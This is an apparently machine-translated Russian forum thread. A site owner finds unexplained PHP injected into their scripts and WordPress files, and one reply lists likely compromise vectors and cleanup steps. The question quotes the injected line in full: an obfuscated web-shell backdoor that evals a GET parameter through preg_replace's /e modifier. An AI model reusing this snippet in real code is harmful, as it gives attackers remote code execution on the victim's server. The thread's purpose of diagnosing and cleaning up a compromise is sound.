нежелательный php код появился на некоторых моих скриптах
У меня есть система на обычном плане хостинга, у компании не было денег, чтобы приобрести облачный план, поэтому я использовал его для запуска, и теперь они планируют перейти на выделенный сервис.
Его простая система php + mysql отслеживает некоторых пользователей и генерирует списки рассылки и некоторые другие вещи.
Проблема в том, что в некоторых файлах я видел код, который не набирал... я не мог понять, о чем этот код, поэтому я здесь, чтобы показать вы:$khg= '_'."GE".'T';if (!empty(${$khg}['15'])) preg_replace('~.*~e', "e".'V'.'al($'.$khg.'["15"])','');
Знает ли кто-нибудь, о чем идет речь?
Ps: на хостинге также есть wordpress (основной сайт компании). Исследуя, я увидел, что это может быть какая-то инъекция php с использованием сбоя wordpress (на некоторых файлах wordpress я тоже видел код). Но я не нашел много информации...
Заранее всем спасибо!
1 ответ:
Существует множество способов скомпрометировать ваш сайт:
Без дополнительной информации невозможно точно узнать, как это делается, но это довольно распространенные компромиссные векторы.
- инъекция sql
- утечка пароля
- вредоносная программа на машине, которая имела пароль FTP к учетной записи
Вы сказали, что у вас есть "простая система PHP + MySQL", которая выполняет задачу. Посмотрите на все места в коде PHP, где вы обрабатываете входные данные. Ты дезинфицирует их? (Вы можете сделать поиск в Google, чтобы узнать больше об этом.) Даже один несанитизированный вход представляет собой потенциальную заднюю дверь для плохого парня.
Как только вы очистите свой код, обновите Wordpress и т. д. не забудьте выполнить оставшуюся очистку, связанную с паролями:
- измените пароль доступа к базе данных (и идентификатор пользователя)
- Измените идентификатор пользователя и пароль" admin", если он есть в вашей системе рассылки.
- измените пароль FTP
- и т. д.